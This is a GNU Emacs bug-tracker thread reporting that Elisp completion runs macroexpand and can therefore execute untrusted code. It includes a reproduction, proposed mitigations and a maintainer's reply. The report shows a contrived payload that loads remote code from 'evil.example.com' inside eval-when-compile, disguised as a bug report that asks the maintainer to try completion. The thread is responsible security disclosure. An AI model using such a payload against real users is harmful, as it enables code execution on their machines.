Subject: bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
From: Wilfred Hughes <me@HIDDEN>
To: bug-gnu-emacs@HIDDEN
Date: Wed, 22 Aug 2018 01:11:55 +0100

elisp-completion-at-point calls macroexpand, which may execute
arbitrary code.

REPRODUCING

1. Insert this code in a buffer in emacs-lisp-mode.

    (let ((foo (eval-when-compile (debug))))
      x)

2. Put point on x.
3. Press C-M-i, or M-x elisp-completion-at-point.
4. Observe that the debugger is opened, because code is being executed!

SEVERITY

I don't know whether Emacs considers calling code-completion on
untrusted code to be a concern or not.

A contrived example might look like a bug report containing the following:

    (let ((foo (eval-when-compile (eval "/ftp:evil.example.com:exploit.el")))
          ;; ... lots of code
          (bar 1))
      ;; Dear maintainer, I've found a bug in your completion. Please try
      ;; completion in the following:
      abc
      )

This could also cause accidental issues, as I might edit code that has
some unwanted side-effects inside eval-when-compile blocks.

However, this functionality has existed since 2013 (added in commit
bbcc4d97447a by Stefan) and no-one has noticed so far.

WORKAROUNDS

When calling macroexpand or macroexpand-all, either:

1. pass in an environment with all untrusted macros replaced with dummies:

    (let ((macro-whitelist '(when pcase))
          all-macros
          safe-env)
      (mapatoms
       (lambda (sym)
         (when (macrop sym)
           (push sym all-macros))))
      (mapc
       (lambda (sym)
         (unless (memq sym macro-whitelist)
           (push (cons sym (symbol-function 'ignore)) safe-env)))
       all-macros)
      (macroexpand-all arbitrary-form-here safe-env))

2. bind all eval-capable functions first (INCOMPLETE, there are other
eval-capable functions, such as load):

    (cl-letf (((symbol-function 'eval) #'ignore)
              ((symbol-function 'eval-region) #'ignore)
              ((symbol-function 'eval-buffer) #'ignore)
              ((symbol-function 'backtrace-eval) #'ignore))
      (macroexpand-all some-arbitrary-form-here))

Subject: control message for bug 32495
From: Glenn Morris <rgm@HIDDEN>
To: control <at> debbugs.gnu.org
Date: Tue, 21 Aug 2018 22:07:41 -0400

tag 32495 security

Subject: bug#32495: 26.1; Arbitrary code execution when completing inside untrusted elisp code
From: Stefan Monnier <monnier@HIDDEN>
To: Wilfred Hughes <me@HIDDEN>
Cc: 32495 <at> debbugs.gnu.org
Date: Thu, 23 Aug 2018 14:54:31 -0400

> 1. pass in an environment with all untrusted macros replaced with dummies:

Sounds like a good first step. We could even start with a blacklist
rather than a whitelist (eval-when-compile, eval-and-compile,
cl-eval-when, ...), so the point would be to protect oneself from
accidental problems rather than from malign adversaries.

> 2. bind all eval-capable functions first (INCOMPLETE, there are other
> eval-capable functions, such as load):

Trying to plug each and every hole sounds like a losing game (e.g. you
can implement `eval` by building a `(lambda () ,exp) and then causing it
to be called one way or another).

Ideally, we'd have some way to confine Elisp code to a sandbox of some
sort (e.g. no access to any I/O and all changes to global vars are
ignored).

        Stefan
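
The blacklist variant suggested in the reply above, written out as an added example (it is not code from the thread or from Emacs itself). All names prefixed `my-safe-expand` are hypothetical, and the macro list is only the three named in the reply, so this guards against accidental evaluation and not against a hostile macro that is already defined.

```elisp
;;; -*- lexical-binding: t -*-
(require 'macroexp)

(defvar my-safe-expand-blocked-macros
  '(eval-when-compile eval-and-compile cl-eval-when)
  "Macros whose expansion evaluates their body (hypothetical name).
Only the macros named in the thread; the list is not exhaustive.")

(defun my-safe-expand--env ()
  "Return a macroexpand environment that overrides the blocked macros.
Each entry is (NAME . EXPANDER).  `ignore' accepts any arguments and
returns nil, so a blocked macro call expands to nil without its body
ever being evaluated."
  (mapcar (lambda (sym) (cons sym #'ignore))
          my-safe-expand-blocked-macros))

(defun my-safe-macroexpand-all (form)
  "Expand FORM with `macroexpand-all' under the blocking environment.
Macros that are not on the blocked list still expand normally, so any
of them that evaluates its arguments during expansion is not covered."
  (macroexpand-all form (my-safe-expand--env)))

(defvar my-safe-expand-demo-counter 0
  "Incremented if the body of the constructed sample form is evaluated.")

(defun my-safe-expand-demo ()
  "Return (PLAIN . FILTERED) for a constructed sample form.
PLAIN is how often the sample body ran under plain `macroexpand-all',
FILTERED how often it ran under `my-safe-macroexpand-all'."
  (let ((form '(let ((foo (eval-when-compile
                            (setq my-safe-expand-demo-counter
                                  (1+ my-safe-expand-demo-counter)))))
                 x))
        plain filtered)
    (setq my-safe-expand-demo-counter 0)
    (macroexpand-all form)              ; body runs during expansion
    (setq plain my-safe-expand-demo-counter)
    (setq my-safe-expand-demo-counter 0)
    (my-safe-macroexpand-all form)      ; blocked macro expands to nil
    (setq filtered my-safe-expand-demo-counter)
    (cons plain filtered)))
```

Evaluate `(my-safe-expand-demo)` in a scratch buffer to compare the two expansions on the sample form.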
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997 nCipher Corporation Ltd,
1994-97 Ian Jackson.